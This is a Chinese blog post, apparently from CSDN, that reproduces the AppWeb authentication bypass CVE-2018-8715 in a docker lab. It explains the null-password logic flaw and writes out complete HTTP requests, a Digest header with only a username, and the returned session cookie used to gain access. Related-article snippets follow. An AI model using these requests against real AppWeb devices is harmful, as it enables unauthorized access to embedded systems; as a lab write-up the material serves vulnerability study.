appweb认证绕过漏洞复现(CVE-2018-8715)

于 2023-10-25 17:08:26 发布
阅读量171 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63963927/article/details/134038083
版权

漏洞描述

AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。

AppWeb可以进行认证配置,其认证方式包括以下三种:

basic 传统HTTP基础认证
digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头
form 表单认证

其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为null(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,并返回session。 

影响范围 

Appweb 7.0.2及早期版本。

漏洞复现

这里使用7.0.1版本

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问http://your-ip:8080/

 

利用该漏洞需要知道一个已存在的用户名,当前环境下用户名为admin。

构造头Authorization: Digest username=admin,并发送如下数据包:

GET / HTTP/1.1
Host: 192.168.217.130:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Digest username=admin

 

若该用户已存在,就会返回一个session,将下图中红色部分复制下来 

-http-session-=8::http.session::14361cb7950dc66e07ed3c2893bb2e53

 

 

再次发送一个请求,带上这个session和username,完整请求如下

POST http://192.168.217.130:8080/ HTTP/1.1
Host: 192.168.217.130:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
-http-session-=8::http.session::14361cb7950dc66e07ed3c2893bb2e53
Authorization: Digest username=admin
Content-Length: 20

username=admin

 

 

拾 味
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
AppWeb认证绕过漏洞CVE-2018-8715
苏莫
07-17 2056
AppWeb认证绕过漏洞CVE-2018-8715) 原理 AppWeb可以进行认证配置,其认证方式包括以下三种: basic 传统HTTP基础认证 digest 改进版HTTP基础认证认证成功后将使用Cookie来保存状态,而不用再传递Authorization头 form 表单认证 其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为null(也就是没...
AppWeb 认证绕过漏洞
AaronLuo
06-07 745
AppWeb 认证绕过漏洞CVE-2018-8715AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。 AppWeb可以进行认证配置,其认证方式包括以下三种: basic 传统HTTP基础认证 digest 改进版HTTP基础认证认证成功后将使用Cookie来保存状态,而不用再传递
AppWeb认证绕过漏洞CVE-2018-8715)(笔记)
wswr的博客
03-21 400
7.0.3之前的版本中 对于digest和form两种认证方式,如果用户传入的密码为null(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,并返回session。 AppWeb认证绕过漏洞CVE-2018-8715复现_图南yukino的博客-CSDN博客 ...
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
AppWeb认证绕过漏洞复现CVE-2018-8715
qq_45785324的博客
01-31 365
CVE-2018-8715漏洞复现
[vulhub]appweb认证绕过漏洞--CVE-2018-8715
haoaaao的博客
04-28 342
0x00 前置 AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。 AppWeb可以进行认证配置,其认证方式包括以下三种: 1、basic 传统HTTP基础认证 2、digest 改进版HTTP基础认证认证成功后将使用Cookie来保存状态,而不用再传递Authorization头
AppWeb认证绕过漏洞CVE-2018-8715漏洞复现
m0_58596609的博客
02-15 3205
AppWeb认证绕过漏洞CVE-2018-8715漏洞复现
AppWeb认证绕过漏洞CVE-2018-8715复现
weixin_44253823的博客
11-01 367
Appweb在7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入空密码,appweb将因为一个逻辑错误导致直接认证成功,并返回session。 漏洞复现 启动漏洞环境。 在浏览器端访问测试目标地址,在burp suite抓包改包重放。 转发修改后的包,访问浏览器,导致空密码登录成功。 ...
漏洞复现----18、AppWeb 身份验证绕过漏洞 (CVE-2018-8715)
七天
06-25 638
文章目录一、简介二、漏洞复现 一、简介 AppWeb 是基于开源 GPL 协议的嵌入式 Web 服务器,由 Embedthis Software LLC 开发和维护。它是用 C/C++ 编写的,几乎可以在任何现代操作系统上运行。它旨在为嵌入式设备提供一个 Web 应用程序容器。 AppWeb可以配置认证,包括以下三种认证方式: 1、basic:传统的HTTP基本认证; 2、digest:改进了 HTTP 基本身份验证。在此模式下,Cookie 将用于身份验证而不是Authorization标头; 3、f
AppWeb 身份验证绕过漏洞CVE-2018-8715
chenming08的博客
04-28 1288
当前漏洞环境部署在vulhub,当前验证环境为vulhub靶场(所有实验均为虚拟环境)4、只保留用户名参数,发包(需取消用户名上的引号,不然发包之后无回显)2、访问AppWeb控制台:http://your-ip:8080。5、将session添加过来,继续发包。3、抓包,使用用户名、密码admin。实验环境:攻击机----kali。使用用户名、密码admin访问。1、进入靶场,启动环境。靶机:centos7。
Vulhub漏洞系列:AppWeb认证绕过漏洞CVE-2018-8715
weixin_43072923的博客
05-18 562
Vulhub漏洞系列:AppWeb认证绕过漏洞CVE-2018-8715)00.前言:01.AppWeb简介02.漏洞描述03.漏洞复现 00.前言: 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.AppWeb简介   AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server,主要的设计思路是安全。   这是直接集成到客户的应用和设备,便于开发和部署基于Web的应用程序
检测App内部的WebView的file域协议是否存在同源策略绕过漏洞
最新发布
06-06
检测App内部的WebView的file域协议是否存在同源策略绕过漏洞需要进行以下几个步骤: 1. 确认App内部是否存在WebView组件,如果存在,则可以进入下一步。 2. 构造一个HTML文件,在文件中引用一个包含漏洞代码的JavaScript文件。 3. 在HTML文件中使用file协议打开JavaScript文件,并通过WebView加载HTML文件。 4. 在JavaScript文件中尝试访问另一个域名下的资源,如果能够成功访问,则说明存在同源策略绕过漏洞。 需要注意的是,这种漏洞存在的原因是WebView默认开启了allowFileAccessFromFileURLs选项,该选项允许WebView通过file协议访问本地文件系统,但同时也会导致同源策略被绕过。因此,开发者需要在使用WebView时关闭该选项,或者对WebView进行其他安全配置,以避免该漏洞的出现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值